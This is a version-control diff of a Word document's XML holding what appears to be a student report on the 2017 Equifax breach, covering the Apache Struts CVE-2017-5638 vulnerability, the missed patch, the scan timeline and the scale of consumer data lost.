+                    <pic:cNvPr id="0" name="Picture 3" descr="Image result for Rick Smith, Chairman and CEO of Equifax"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId8">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2019300" cy="2019300"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+            <wp14:sizeRelH relativeFrom="margin">
+              <wp14:pctWidth>0</wp14:pctWidth>
+            </wp14:sizeRelH>
+            <wp14:sizeRelV relativeFrom="margin">
+              <wp14:pctHeight>0</wp14:pctHeight>
+            </wp14:sizeRelV>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>The</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> known specific cause of the Equifax breach was a failure to install a well-publicized security patch to </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Apache Struts</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> detailed seven months prior to the breach</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Specifically, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">CVE-2017-5638 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>published</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> on March 10</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:vertAlign w:val="superscript"/>
+        </w:rPr>
+        <w:t>th</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> of 2017 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">details that </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">an exploit allows remote attackers to execute arbitrary commands </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">to abuse the Strut’s parser </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">via a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>created message where the header contains</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> #</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>cmd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>= string.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -177,120 +1126,215 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">massive amounts of data </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>on consumers and possess the ability to</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> turn over</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> the said data</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> to</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> anyone who want</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>s</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> to know credit </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>of certain</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> individuals.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Originally named Retail Credit Company before its last controversy, Equifax changed its name for a better image and expanded its credit report onto companies in the United States after 1975. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
         <w:ind w:firstLine="720"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Forward to </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>September 7</w:t>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">At the time </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Cisco's </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Talos</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> security division </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">warned </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">that, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">"It is likely that the exploitation will continue in a wide scale since it is relatively trivial to exploit and there are clearly systems </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>that are potentially vulnerable.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">" </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Detailing that the exploit itself was adamantly difficult to easily patch due to the widespread nature of the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Jakarta Multipart </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>parser</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> used in this exploit which coincidently applies to several Java Oracle devices. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
+        <w:ind w:firstLine="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>CVSS scores,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> provided in Figure </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>3</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, detail the report at the highest possible critical value. Known exploits, (unless listed as false-positives), going unsolved for a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>seven-month</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> period </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>allowed for this controversy to cause a great uproar in the cybersecurity community.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Considering the information of the victims being at such a high target mixed with the even higher target of the company itself, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>the uproar is understandable.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Vulnerability scans performed by Equifax were reportedly observed on July 29</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -307,173 +1351,527 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">, 2017, Equifax announced a cybercrime </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">identity theft event. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Equifax breach had a major failure on the internal control of security system. The underlying causes of this breach</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> involved </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>n “Apache Struts” vulnerability with an</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> IT systems administrator using an insecure </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">password. </w:t>
+        <w:t>, five months after the official release of the vulnerability itself.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
+        <w:ind w:firstLine="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>The first steps in company mitigation should have been for scanning for vulnerabilities themselves. A five-month period spanning between vulnerability release and observation leads to believe that Equifax was in dire need of VM distribution over the manager admin interface. After observation, the proper steps could have been taken to resolve the critical vulnerability</w:t>
       </w:r>
       <w:bookmarkStart w:id="0" w:name="_GoBack"/>
       <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
         <w:ind w:firstLine="720"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">This attack impacted approximately 145.5 million U.S. consumers along with several million Canadian and British residents. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> T</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>he Equifax breach</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> is the first</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> of its kind that</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>leaked</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">name, address, birth </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">date, and Social Security number of several million </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">sent to the deep web </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>all at once</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>It</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> is considered one of the worst data breaches in internet history.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Not only is the information vital to a user’s everyday living and financials, so many users were affected that the repair process is near impossible.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
         <w:ind w:firstLine="720"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">The publicized and known specific cause of the Equifax breach was a failure to install a well-publicized security patch to </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>System Affected</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:ind w:firstLine="720"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">This attack impacted </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
